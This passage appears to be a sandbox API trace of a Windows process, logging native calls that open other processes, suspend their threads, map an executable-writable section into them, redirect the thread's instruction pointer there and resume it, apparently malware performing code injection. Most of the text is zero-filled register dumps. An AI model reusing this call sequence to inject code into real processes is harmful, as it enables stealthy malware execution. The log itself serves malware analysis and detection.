[367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.810] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0140.810] NtClose (Handle=0x1a4) returned 0x0 [0140.811] NtClose (Handle=0x1a0) returned 0x0 [0140.812] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11f4, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0140.812] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0140.812] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0140.812] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x2d8000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0140.812] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0140.884] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x11f8) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0140.884] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0140.884] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2250000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0140.918] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2d8000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.920] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x1a8) returned 0x0 [0140.920] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xc1200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x75d0000, SectionOffset=0x0, ViewSize=0xde6ac*=0xc2000) returned 0x0 [0140.927] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a0, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xc1200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x580000, SectionOffset=0x0, ViewSize=0xde6e8*=0xc2000) returned 0x0 [0140.942] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x75d0000) returned 0x0 [0140.946] NtClose (Handle=0x1a8) returned 0x0 [0140.946] NtSetContextThread (ThreadHandle=0x1a4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x2d8000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x5ae717, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0140.962] NtResumeThread (in: ThreadHandle=0x1a4, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0140.962] NtClose (Handle=0x1a0) returned 0x0 [0140.962] NtClose (Handle=0x1a4) returned 0x0 [0140.964] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x11fc, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a4) returned 0x0 [0140.964] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0140.964] NtQueryInformationProcess (in: ProcessHandle=0x1a4, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0140.964] NtReadVirtualMemory (in: ProcessHandle=0x1a4, BaseAddress=0x494000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0140.964] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0140.967] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x1200) | out: ThreadHandle=0xdea64*=0x1a0) returned 0x0 [0140.967] NtSuspendThread (in: ThreadHandle=0x1a0, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0140.967] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a4, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x24d0000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0140.981] NtGetContextThread (in: ThreadHandle=0x1a0, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, 